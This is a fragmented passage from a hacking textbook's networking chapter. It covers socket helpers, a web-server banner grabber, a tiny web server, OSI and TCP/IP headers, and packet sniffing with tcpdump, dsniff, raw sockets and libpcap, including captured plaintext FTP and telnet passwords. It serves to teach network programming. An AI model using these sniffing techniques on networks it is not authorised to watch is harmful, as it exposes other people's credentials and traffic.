52 (CentOS)
Accept-Ranges: bytes
Content-Length: 6743
Connection: close
Content-Type: text/html; charset=UTF-8
Connection closed by foreign host
...
0
...
This can be useful for profiling, so let's write a program that
automates this manual process
...
Since the
standard socket functions aren't very friendly, let's write some functions to send
and receive data
...
h
...
The send_string()
function accepts a socket and a string pointer as arguments and makes sure the
entire string is sent out over the socket
...

You may have noticed that every packet the simple server received ended with
the bytes 0x0D and 0x0A
...
The HTTP protocol also expects lines to
be terminated with these two bytes
...

reader@hacking:~/booksrc $ man ascii | egrep "Hex|0A|0D"
Reformatting ascii(7), please wait
...
It reads from the socket
passed as the first argument into the a buffer that the second argument points to
...
Then it terminates the string and exits the
function
...
They are listed below in a new include file called
hacking-network
...

hacking-network
...
The function will make sure all the bytes of the
* string are sent
...

*/
int send_string(int sockfd, unsigned char *buffer) {
int sent_bytes, bytes_to_send;
bytes_to_send = strlen(buffer);
while(bytes_to_send > 0) {
sent_bytes = send(sockfd, buffer, bytes_to_send, 0);
if(sent_bytes == -1)
return 0; // Return 0 on send error
...

}
/* This function accepts a socket FD and a ptr to a destination
* buffer
...
The EOL bytes are read from the socket, but
* the destination buffer is terminated before these bytes
...

*/
int recv_line(int sockfd, unsigned char *dest_buffer) {
#define EOL "\r\n" // End-of-line byte sequence
#define EOL_SIZE 2
unsigned char *ptr;
int eol_matched = 0;
ptr = dest_buffer;
while(recv(sockfd, ptr, 1, 0) == 1) { // Read a single byte
...

return strlen(dest_buffer); // Return bytes received
}
} else {
eol_matched = 0;
}
ptr++; // Increment the pointer to the next byter
...

}

Making a socket connection to a numerical IP address is pretty simple but named
addresses are commonly used for convenience
...
internic
...
0
...
161
...

Naturally, there are socket-related functions and structures specifically for
hostname lookups via DNS
...
h
...

The hostent structure is filled with information from the lookup, including the
numerical IP address as a 32-bit integer in network byte order
...
This structure is shown below, as listed in netdb
...

From /usr/include/netdb
...
*/
struct hostent
{
char *h_name; /* Official name of host
...
*/
int h_addrtype; /* Host address type
...
*/
char **h_addr_list; /* List of addresses from name server
...
*/
};

The following code demonstrates the use of the gethostbyname() function
...
c
#include ...
h>
#include ...
h>
#include ...
h>
#include ...
h"
int main(int argc, char *argv[]) {
struct hostent *host_info;
struct in_addr *address;
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(1);
}
host_info = gethostbyname(argv[1]);

if(host_info == NULL) {
printf("Couldn't lookup %s\n", argv[1]);
} else {
address = (struct in_addr *) (host_info->h_addr);
printf("%s has address %s\n", argv[1], inet_ntoa(*address));
}
}

This program accepts a hostname as its only argument and prints out the IP
address
...
A pointer to this element is
typecast into an in_addr pointer, which is later dereferenced for the call to
inet_ntoa(), which expects a in_addr structure as its argument
...

reader@hacking:~/booksrc $ gcc -o host_lookup host_lookup
...
/host_lookup www
...
net
www
...
net has address 208
...
188
...
/host_lookup www
...
com
www
...
com has address 74
...
19
...

webserver_id
...
h>
#include ...
h>
#include ...
h>
#include ...
h>

#include "hacking
...
h"
int main(int argc, char *argv[]) {
int sockfd;
struct hostent *host_info;
struct sockaddr_in target_addr;
unsigned char buffer[4096];
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(1);
}
if((host_info = gethostbyname(argv[1])) == NULL)
fatal("looking up hostname");

if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
target_addr
...
sin_port = htons(80);
target_addr
...
sin_zero), '\0', 8); // Zero the rest of the struct
...
0\r\n\r\n");
while(recv_line(sockfd, buffer)) {
if(strncasecmp(buffer, "Server:", 7) == 0) {
printf("The web server for %s is %s\n", argv[1], buffer+8);
exit(0);
}
}
printf("Server line not found\n");
exit(1);
}

Most of this code should make sense to you now
...
The connect() function is called to connect to port 80 of the target host, the
command string is sent, and the program loops reading each line into buffer
...
h
...
The first
two arguments are pointers to the strings, and the third argument is n, the
number of bytes to compare
...
When it finds it,
it removes the first eight bytes and prints the webserver version information
...

reader@hacking:~/booksrc $ gcc -o webserver_id webserver_id
...
/webserver_id www
...
net
The web server for www
...
net is Apache/2
...
52 (CentOS)
reader@hacking:~/booksrc $
...
microsoft
...
microsoft
...
0
reader@hacking:~/booksrc $

A Tinyweb Server
A webserver doesn't have to be much more complex than the simple server we
created in the previous section
...

The server code listed below is nearly identical to the simple server, except that
connection handling code is separated into its own function
...
The program
will look for the requested resource in the local directory called webroot and send
it to the browser
...
You may already be familiar with this response, which means File
Not Found
...

tinyweb
...
h>
#include ...
h>
#include ...
h>
#include ...
h>
#include ...
h"
#include "hacking-network
...
/webroot" // The web server's root directory
void handle_connection(int, struct sockaddr_in *); // Handle web requests
int get_file_size(int); // Returns the filesize of open file descriptor
int main(void) {
int sockfd, new_sockfd, yes=1;
struct sockaddr_in host_addr, client_addr; // My address information
socklen_t sin_size;
printf("Accepting web requests on port %d\n", PORT);
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
fatal("setting socket option SO_REUSEADDR");
host_addr
...
sin_port = htons(PORT); // Short, network byte order
host_addr
...
s_addr = INADDR_ANY; // Automatically fill with my IP
...
sin_zero), '\0', 8); // Zero the rest of the struct
...

sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
if(new_sockfd == -1)
fatal("accepting connection");
handle_connection(new_sockfd, &client_addr);
}
return 0;
}
/* This function handles the connection on the passed socket from the
* passed client address
...
Finally, the
* passed socket is closed at the end of the function
...

if(ptr == NULL) { // Then this isn't valid HTTP
...

ptr = NULL; // Set ptr to NULL (used to flag for an invalid request)
...

if(strncmp(request, "HEAD ", 5) == 0) // HEAD request
ptr = request+5; // ptr is the URL
...

printf("\tUNKNOWN REQUEST!\n");
} else { // Valid request, with ptr pointing to the resource name
if (ptr[strlen(ptr) - 1] == '/') // For resources ending with '/',
strcat(ptr, "index
...
html' to the end
...

fd = open(resource, O_RDONLY, 0); // Try to open the file
...
0 404 NOT FOUND\r\n");
send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
send_string(sockfd, "404 Not Found");
send_string(sockfd, "

URL not found

\r\n");
} else { // Otherwise, serve up the file
...
0 200 OK\r\n");
send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
if(ptr == request + 4) { // Then this is a GET request
if( (length = get_file_size(fd)) == -1)
fatal("getting resource file size");
if( (ptr = (unsigned char *) malloc(length)) == NULL)
fatal("allocating memory for reading resource");
read(fd, ptr, length); // Read the file into memory
...

free(ptr); // Free file memory
...

} // End if block for file found/not found
...

} // End if block for valid HTTP
...

}
/* This function accepts an open file descriptor and returns
* the size of the associated file
...

*/
int get_file_size(int fd) {
struct stat stat_struct;

if(fstat(fd, &stat_struct) == -1)
return -1;
return (int) stat_struct
...
The strstr() function returns a pointer to
the substring, which will be right at the end of the request
...
A HEAD request will just return the headers, while a GET request will also
return the requested resource (if it can be found)
...
html and image
...
Root
privileges are needed to bind to any port below 1024, so the program is setuid
root and executed
...
0
...
1:
reader@hacking:~/booksrc $ ls -l webroot/
total 52
-rwxr--r-- 1 reader reader 46794 2007-05-28 23:43 image
...
html
reader@hacking:~/booksrc $ cat webroot/index
...
and here is some sample text

...
jpg">

reader@hacking:~/booksrc $ gcc -o tinyweb tinyweb
...
/tinyweb
reader@hacking:~/booksrc $ sudo chmod u+s
...
/tinyweb
Accepting web requests on port 80
Got request from 127
...
0
...
1"
Opening '
...
html' 200 OK
Got request from 127
...
0
...
jpg HTTP/1
...
/webroot/image
...
0
...
1:52998 "GET /favicon
...
1"
Opening '
...
ico' 404 Not Found

The address 127
...
0
...
The initial request gets index
...
jpg
...
ico in
an attempt to retrieve an icon for the web page
...

Figure 0x400-3
...
At the upper layers of OSI,
many protocols can be plaintext since all the other details of the connection are
already taken care of by the lower layers
...
TCP on the
transport layer (4) provides reliability and transport control, while IP on the
network layer (3) provides addressing and packet-level communication
...
At the bottom, the physical
layer (1) is simply the wire and the protocol used to send bits from one device to
another
...

This process can be thought of as an intricate interoffice bureaucracy,
reminiscent of the movie Brazil
...
As
data packets are transmitted, each receptionist performs the necessary duties of
her particular layer, puts the packet in an interoffice envelope, writes the header
on the outside, and passes it on to the receptionist at the next layer below
...

Network traffic is a chattering bureaucracy of servers, clients, and peer-to-peer
connections
...
Regardless of what the packets contain, the protocols used at
the lower layers to move the data from point A to point B are usually the same
...

Data-Link Layer
The lowest visible layer is the data-link layer
...
This layer provides a way to address and
send messages to anyone else in the office, as well as to figure out who's in the
office
...
These addresses are known as Media Access Control (MAC)
addresses
...
These
addresses are also sometimes referred to as hardware addresses, since each

address is unique to a piece of hardware and is stored in the device's integrated
circuit memory
...

An Ethernet header is 14 bytes in size and contains the source and destination
MAC addresses for this Ethernet packet
...
Any
Ethernet packet sent to this address will be sent to all the connected devices
...
The concept of IP addresses doesn't exist at this level, only
hardware addresses do, so a method is needed to correlate the two addressing
schemes
...
In Ethernet, the method is known as Address
Resolution Protocol (ARP)
...
There are four different types of ARP messages, but the two
most important types are ARP request messages and ARP reply messages
...
This type is used
to specify whether the packet is an ARP-type message or an IP packet
...
" An ARP reply is the
corresponding response that is sent to the requester's MAC address (and IP
address) saying, "This is my MAC address, and I have this IP address
...

These caches are like the interoffice seating chart
...
10
...
20 and MAC address
00:00:00:aa:aa:aa, and another system on the same network has the IP address
10
...
10
...

Figure 0x400-4
...
10
...
50, the first system will first check its ARP cache
to see if an entry exists for 10
...
10
...
Since this is the first time these two
systems are trying to communicate, there will be no such entry, and an ARP
request will be sent out to the broadcast address, saying, "If you are 10
...
10
...
" Since this request uses the
broadcast address, every system on the network sees the request, but only the
system with the corresponding IP address is meant to respond
...
10
...
50 and I'm at 00:00:00:bb:bb:bb
...

Network Layer
The network layer is like a worldwide postal service providing an addressing and
delivery method used to send things everywhere
...

Every system on the Internet has an IP address, consisting of a familiar four-byte
arrangement in the form of xx
...
xx
...
The IP header for packets in this layer is
20 bytes in size and consists of various fields and bitflags as defined in RFC 791
...
SPECIFICATION
3
...
Internet Header Format
A summary of the contents of the internet header follows:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Example Internet Datagram Header

Figure 4
...

This surprisingly descriptive ASCII diagram shows these fields and their positions
in the header
...
Similar to the
Ethernet header, the IP header also has a protocol field to describe the type of
data in the packet and the source and destination addresses for routing
...

The Internet Protocol is mostly used to transmit packets wrapped in higher layers
...
ICMP packets are used for messaging and diagnostics
...
If there's a problem, an ICMP packet is sent back to notify the
sender of the problem
...
ICMP Echo Request and Echo
Reply messages are used by a utility called ping
...
Upon receipt of the ICMP Echo Request, the remote host sends
back an ICMP Echo Reply
...
However, it is important to remember
that ICMP and IP are both connectionless; all this protocol layer really cares about
is getting the packet to its destination address
...
IP can deal with this situation by fragmenting packets,
as shown here
...

The packet is broken up into smaller packet fragments that can pass through the
network link, IP headers are put on each fragment, and they're sent off
...

When the destination receives these fragments, the offset values are used to
reassemble the original IP packet
...
This is the job of the protocols

at the transport layer
...
If a customer wants to return a
defective piece of merchandise, they send a message requesting a Return
Material Authorization (RMA) number
...
The post office is only concerned with
sending these messages (and packages) back and forth, not with what's in them
...
TCP is the most commonly used protocol for
services on the Internet: telnet, HTTP (web traffic), SMTP (email traffic), and FTP
(file transfers) all use TCP
...
Stream sockets use TCP/IP connections
...
Reliability simply means that
TCP will ensure that all the data will reach its destination in the proper order
...
If
some packets in the middle of a connection are lost, the destination will hold on to
the packets it has while the source retransmits the missing packets
...
The TCP flags are as follows:
T CP flag Meaning

Purpose

URG

Urgent

Identifies important data

ACK

Acknowledgment Acknowledges a packet; it is turned on for the majority of the connection

PSH

Push

Tells the receiver to push the data through instead of buffering it

RST

Reset

Resets a connection

SYN

Synchronize

Synchronizes sequence numbers at the beginning of a connection

FIN

Finish

Gracefully closes a connection when both sides say goodbye

These flags are stored in the TCP header along with the source and destination
ports
...

From RFC 793

[Page 14]
September 1981
Transmission Control Protocol
3
...
1
...
The Internet Protocol
header carries several information fields, including the source and
destination host addresses [2]
...
This
division allows for the existence of host level protocols other than
TCP
...

Figure 3
...

The SYN and ACK flags are used together to open connections in a three-step
handshaking process
...
The server
then responds with a packet that has both the SYN and ACK flags turned on
...
After that, every packet in the connection will have the ACK flag
turned on and the SYN flag turned off
...

Figure 0x400-6
...

When a connection is initiated, each side generates an initial sequence number
...
Then, with each packet that is sent, the sequence number
is incremented by the number of bytes found in the data portion of the packet
...
In addition, each
TCP header has an acknowledgment number, which is simply the other side's
sequence number plus one
...
However, the cost of this functionality is paid in communication
overhead
...
This lack of
functionality makes it behave much like the IP protocol: It is connectionless and
unreliable
...
Sometimes connections aren't needed, and the lightweight UDP is a much
better protocol for these situations
...
It only contains four 16-bit values in this order: source port,
destination port, length, and checksum
...
On an unswitched network, Ethernet packets pass through every device on
the network, expecting each system device to only look at the packets sent to its
destination address
...
Most
packet-capturing programs, such as tcpdump, drop the device they are listening
to into promiscuous mode by default
...

reader@hacking:~/booksrc $ ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0C:29:34:61:65
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:17115 errors:0 dropped:0 overruns:0 frame:0
TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4602913 (4
...
2 KiB)
Interrupt:16 Base address:0x2024
reader@hacking:~/booksrc $ sudo ifconfig eth0 promisc
reader@hacking:~/booksrc $ ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0C:29:34:61:65
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:17181 errors:0 dropped:0 overruns:0 frame:0
TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4668475 (4
...
2 KiB)
Interrupt:16 Base address:0x2024
reader@hacking:~/booksrc $

The act of capturing packets that aren't necessarily meant for public viewing is
called sniffing
...

reader@hacking:~/booksrc $ sudo tcpdump -l -X 'ip host 192
...
0
...
684964 192
...
0
...
ftp > 192
...
0
...
32778: P 1:42(41) ack 1 win
17316 (DF)
0x0000 4500 005d e065 4000 8006 97ad c0a8 0076 E
...
v
0x0010 c0a8 00c1 0015 800a 292e 8a73 5ed4 9ce8
...

0x0020 8018 43a4 a12f 0000 0101 080a 0007 1f78
...
x
0x0030 000e 0a8a 3232 3020 5459 5053 6f66 7420
...
TYPSoft
...
Server
...
99
...
685132 192
...
0
...
32778 > 192
...
0
...
ftp:
...
4
...

0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c
...

0x0020 8010 16d0 81db 0000 0101 080a 000e 0c56
...
x
21:27:52
...
168
...
193
...
168
...
118
...
p@
...
v
...
Z
0x0030 0007 1f78 5553 4552 206c 6565 6368 0d0a
...
leech
...
415487 192
...
0
...
ftp > 192
...
0
...
32778: P 42:76(34) ack 13
win 17304 (DF)
0x0000 4500 0056 e0ac 4000 8006 976d c0a8 0076 E
...
m
...

0x0020 8018 4398 4e2c 0000 0101 080a 0007 1fc5
...
N,
...
Z331
...
required
...
le
0x0050 6563 ec
21:27:52
...
168
...
193
...
168
...
118
...
ack 76 win 5840
(DF) [tos 0x10]
0x0000 4510 0034 9671 4000 4006 21bb c0a8 00c1 E
...
q@
...
v
...
[
0x0030 0007 1fc5
...
155458 192
...
0
...
32778 > 192
...
0
...
ftp: P 13:27(14) ack 76
win 5840 (DF) [tos 0x10]
0x0000 4510 0042 9672 4000 4006 21ac c0a8 00c1 E
...
r@
...
v
...

0x0030 0007 1fc5 5041 5353 206c 3840 6e69 7465
...
l8@nite
0x0040 0d0a
...
179427 192
...
0
...
ftp > 192
...
0
...
32778: P 76:103(27) ack 27
win 17290 (DF)
0x0000 4500 004f e0cc 4000 8006 9754 c0a8 0076 E
...
T
...

0x0020 8018 438a 4c8c 0000 0101 080a 0007 1feb
...
L
...
230
...
lee
0x0040 6368 206c 6f67 6765 6420 696e 2e0d 0a ch
...
in
...
In the preceding example, the user leech is seen logging into an
FTP server using the password l8@nite
...

tcpdump is a wonderful, general-purpose packet sniffer, but there are specialized
sniffing tools designed specifically to search for usernames and passwords
...

reader@hacking:~/booksrc $ sudo dsniff -n
dsniff: listening on eth0
----------------12/10/02 21:43:21 tcp 192
...
0
...
32782 -> 192
...
0
...
21 (ftp)
USER leech
PASS l8@nite
----------------12/10/02 21:47:49 tcp 192
...
0
...
32785 -> 192
...
0
...
23 (telnet)
USER root
PASS 5eCr3t

Raw Socket Sniffer

So far in our code examples, we have been using stream sockets
...
Accessing the OSI model of the session (5) layer, the operating system
takes care of all of the lower-level details of transmission, correction, and routing
...
At this lower
layer, all the details are exposed and must be handled explicitly by the
programmer
...
In this
case, the protocol matters since there are multiple options
...
The following example is a TCP
sniffing program using raw sockets
...
c
#include ...
h>
#include ...
h>
#include ...
h>
#include "hacking
...
Notice that buffer is declared as a
u_char variable
...
h that
expands to "unsigned char
...

When compiled, the program needs to be run as root, because the use of raw
sockets requires root access
...

reader@hacking:~/booksrc $ gcc -o raw_tcpsniff raw_tcpsniff
...
/raw_tcpsniff
[!!] Fatal Error in socket: Operation not permitted
reader@hacking:~/booksrc $ sudo
...
D
...
F#
...
l
...
2G
...
;e
...

Got a 70 byte packet
45 10 00 46 1e 37 40 00 40 06 46 20 c0 a8 2a 01 | E
...
7@
...

c0 a8 2a f9 8b 12 1e d2 ac 14 cf a2 e5 10 6c c9 |
...

80 18 05 b4 27 95 00 00 01 01 08 0a 26 ab a0 75 |
...
(AAAAAAAAAAAA
41 41 41 41 0d 0a | AAAA
...
G
...
F
...
l
...
hE
...
fjsdalkfjask
66 6a 61 73 64 0d 0a | fjasd
...
Also, it only captures TCP packets
—to capture UDP or ICMP packets, additional raw sockets need to be opened for
each
...
Raw socket code for Linux most likely won't work
on BSD or Solaris
...

libpcap Sniffer
A standardized programming library called libpcap can be used to smooth out the
inconsistencies of raw sockets
...
Both tcpdump and dsniff use libpcap, which allows them to
compile with relative ease on any platform
...
These functions are
quite intuitive, so we will discuss them using the following code listing
...
c
#include ...
h"
void pcap_fatal(const char *failed_in, const char *errbuf) {
printf("Fatal Error in %s: %s\n", failed_in, errbuf);
exit(1);
}

First, pcap
...
Also, I've written a pcap_fatal() function for displaying fatal
errors
...

int main() {
struct pcap_pkthdr header;
const u_char *packet;

char errbuf[PCAP_ERRBUF_SIZE];
char *device;
pcap_t *pcap_handle;
int i;

The errbuf variable is the aforementioned error buffer, its size coming from a
define in pcap
...
The header variable is a pcap_pkthdr structure
containing extra capture information about the packet, such as when it was
captured and its length
...

device = pcap_lookupdev(errbuf);
if(device == NULL)
pcap_fatal("pcap_lookupdev", errbuf);
printf("Sniffing on device %s\n", device);

The pcap_lookupdev() function looks for a suitable device to sniff on
...
For our system
this will always be /dev/eth0, although it will be different on a BSD system
...

pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
if(pcap_handle == NULL)
pcap_fatal("pcap_open_live", errbuf);

Similar to the socket function and file open function, the pcap_open_live()
function opens a packet-capturing device, returning a handle to it
...
Since we want to capture
in promiscuous mode, the promiscuous flag is set to 1
...
len);
dump(packet, header
...
This
function is passed the pcap_handle and a pointer to a pcap_pkthdr structure so it
can fill it with details of the capture
...
Then
pcap_close() closes the capture interface
...
This can be
done using the -l flag with GCC, as shown in the output below
...

reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff
...
o: In function `main':
pcap_sniff
...
text+0x1c8): undefined reference to `pcap_lookupdev'
pcap_sniff
...
text+0x233): undefined reference to `pcap_open_live'

pcap_sniff
...
text+0x282): undefined reference to `pcap_next'
pcap_sniff
...
text+0x2c2): undefined reference to `pcap_close'
collect2: ld returned 1 exit status
reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff
...
/pcap_sniff
Fatal Error in pcap_lookupdev: no suitable device found
reader@hacking:~/booksrc $ sudo
...
l
...
e
...

00 44 1e 39 40 00 40 06 46 20 c0 a8 2a 01 c0 a8 |
...
9@
...

2a f9 8b 12 1e d2 ac 14 cf c7 e5 10 6c c9 80 18 | *
...

05 b4 54 1a 00 00 01 01 08 0a 26 b6 a7 76 02 3c |
...
v
...
this is a test
0d 0a |
...
e
...
P
...

00 34 3d 2c 40 00 40 06 27 4d c0 a8 2a f9 c0 a8 |
...
'M
...
l
...
G'l&
...
v
Got a 84 byte packet
00 01 6c eb 1d 50 00 01 29 15 65 b6 08 00 45 10 |
...
P
...
E
...
F
...

2a f9 8b 12 1e d2 ac 14 cf d7 e5 10 6c c9 80 18 | *
...

05 b4 11 b3 00 00 01 01 08 0a 26 b6 a9 c8 02 47 |
...

reader@hacking:~/booksrc $

Notice that there are many bytes preceding the sample text in the packet and
many of these bytes are similar
...

Decoding the Layers
In our packet captures, the outermost layer is Ethernet, which is also the lowest
visible layer
...
The header for this layer contains the source MAC address, the
destination MAC address, and a 16-bit value that describes the type of Ethernet
packet
...
h and the structures for the IP header and TCP
header are located in /usr/include/netinet/ip
...
h,
respectively
...
A better
understanding can be gained from writing our own structures, so let's use the
structure definitions as guidance to create our own packet header structures to
include in hacking-network
...

First, let's look at the existing definition of the Ethernet header
...
h

#define ETH_ALEN 6 /* Octets in one ethernet addr */
#define ETH_HLEN 14 /* Total octets in header */
/*
* This is an Ethernet frame header
...
The variable
declaration of __be16 turns out to be a type definition for a 16-bit unsigned short
integer
...

reader@hacking:~/booksrc $
$ grep -R "typedef
...
h:typedef __u16 __bitwise __be16;

$ grep -R "typedef
...
h:typedef unsigned short __u16;
/usr/include/linux/cramfs_fs
...
h:typedef unsigned short __u16;
$

The include file also defines the Ethernet header length in ETH_HLEN as 14 bytes
...
However,
many compilers will pad structures along 4-byte boundaries for alignment, which
means that sizeof(struct ethhdr) would return an incorrect size
...

By including ...
Since we want to make our own
structures for hacking-network
...
While we're at it, let's give these fields better names
...
h
#define ETHER_ADDR_LEN 6
#define ETHER_HDR_LEN 14
struct ether_hdr {
unsigned char ether_dest_addr[ETHER_ADDR_LEN]; // Destination MAC address
unsigned char ether_src_addr[ETHER_ADDR_LEN]; // Source MAC address
unsigned short ether_type; // Type of Ethernet packet
};

We can do the same thing with the IP and TCP structures, using the
corresponding structures and RFC diagrams as a reference
...
h
struct iphdr
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
unsigned int ihl:4;
unsigned int version:4;
#elif __BYTE_ORDER == __BIG_ENDIAN
unsigned int version:4;
unsigned int ihl:4;
#else
# error "Please fix ...
*/
};

From RFC 791
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Example Internet Datagram Header

Each element in the structure corresponds to the fields shown in the RFC header
diagram
...
These fields are in the network byte order, so, if the host is little-endian, the
IHL should come before Version since the byte order is reversed
...

Added to hacking-network
...
IP headers are always 20 bytes
...
h for the
structure and RFC 793 for the header diagram
...
h
typedef u_int32_t tcp_seq;
/*
* TCP header
...

*/
struct tcphdr
{
u_int16_t th_sport; /* source port */
u_int16_t th_dport; /* destination port */
tcp_seq th_seq; /* sequence number */
tcp_seq th_ack; /* acknowledgment number */
# if __BYTE_ORDER == __LITTLE_ENDIAN
u_int8_t th_x2:4; /* (unused) */
u_int8_t th_off:4; /* data offset */
# endif
# if __BYTE_ORDER == __BIG_ENDIAN
u_int8_t th_off:4; /* data offset */
u_int8_t th_x2:4; /* (unused) */
# endif
u_int8_t th_flags;
# define TH_FIN 0x01
# define TH_SYN 0x02
# define TH_RST 0x04
# define TH_PUSH 0x08
# define TH_ACK 0x10
# define TH_URG 0x20
u_int16_t th_win; /* window */
u_int16_t th_sum; /* checksum */
u_int16_t th_urp; /* urgent pointer */
};

From RFC 793
TCP Header Format
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data | |U|A|P|R|S|F| |
| Offset| Reserved |R|C|S|S|Y|I| Window |
| | |G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Data Offset: 4 bits
The number of 32 bit words in the TCP Header
...
The TCP header (even one including options) is an
integral number of 32 bits long
...
Must be zero
...
The
data offset field is important, since it tells the size of the variablelength TCP
header
...
This is because the RFC defines this field as optional
...
So the TCP header size in bytes equals
the data offset field from the header times four
...

The th_flags field of Linux's tcphdr structure is defined as an 8-bit unsigned
character
...

Added to hacking-network
...
But before we do, let's talk about
libpcap for a moment
...
Very few
programs actually use pcap_next(), because it's clumsy and inefficient
...
This means the pcap_loop()
function is passed a function pointer, which is called every time a packet is
captured
...
If
the count argument is set to -1, it will loop until the program breaks out of it
...

Naturally, the callback function needs to follow a certain prototype, since
pcap_loop() must call this function
...
It can be used to pass additional information to the callback
function, but we aren't going to be using this
...

The following example code uses pcap_loop() with a callback function to capture
packets and our header structures to decode them
...

decode_sniff
...
h>
#include "hacking
...
h"
void pcap_fatal(const char *, const char *);
void decode_ethernet(const u_char *);
void decode_ip(const u_char *);
u_int decode_tcp(const u_char *);
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int main() {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;

char errbuf[PCAP_ERRBUF_SIZE];
char *device;
pcap_t *pcap_handle;
device = pcap_lookupdev(errbuf);
if(device == NULL)
pcap_fatal("pcap_lookupdev", errbuf);
printf("Sniffing on device %s\n", device);
pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
if(pcap_handle == NULL)
pcap_fatal("pcap_open_live", errbuf);
pcap_loop(pcap_handle, 3, caught_packet, NULL);

pcap_close(pcap_handle);
}

At the beginning of this program, the prototype for the callback function, called
caught_packet(), is declared along with several decoding functions
...
This function is passed the pcap_handle, told to
capture three packets, and pointed to the callback function, caught_packet()
...
Also, notice that the decode_tcp()function returns a u_int
...

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char
*packet) {
int tcp_header_length, total_header_size, pkt_data_len;
u_char *pkt_data;
printf("==== Got a %d byte packet ====\n", cap_header->len);

decode_ethernet(packet);
decode_ip(packet+ETHER_HDR_LEN);
tcp_header_length = decode_tcp(packet+ETHER_HDR_LEN+sizeof(struct ip_hdr));
total_header_size = ETHER_HDR_LEN+sizeof(struct ip_hdr)+tcp_header_length;
pkt_data = (u_char *)packet + total_header_size; // pkt_data points to the data
portion
...
